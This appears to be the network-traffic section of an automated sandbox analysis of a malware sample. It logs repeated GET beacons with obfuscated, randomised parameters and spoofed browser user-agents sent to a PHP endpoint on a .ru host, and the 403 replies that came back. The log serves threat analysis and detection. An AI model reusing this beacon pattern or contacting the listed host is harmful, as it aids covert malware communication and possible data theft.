            Source: global trafficHTTP traffic detected: GET /1606aca9.php?NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&n8ux2yA6XyMoklAzV5ek7V=UqOdN8 HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&n8ux2yA6XyMoklAzV5ek7V=UqOdN8 HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Va8TbDE3pURmmcb44lzH99wN=hAzBJZDaz2bjGSGnaj3&7jMwN3LmsuWnut3CP1f4OLxk9UyStej=2Ol8yDyQOasFfx&WYDXiE9vwvmw2E33OL6ugH5OMD=qxcrEMfc3 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: a0947291.xsph.ru
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWcoDkvPMgt9nivozNf=bmOSJW4Fs5auqV9RDO1j HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&n8ux2yA6XyMoklAzV5ek7V=UqOdN8 HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&n8ux2yA6XyMoklAzV5ek7V=UqOdN8 HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: a0947291.xsph.ru
            Source: global trafficDNS traffic detected: DNS query: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:17:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:17:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:18:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:18:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:19:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:19:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:19:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:19:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:20:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 
68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:20:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 
68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:20:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 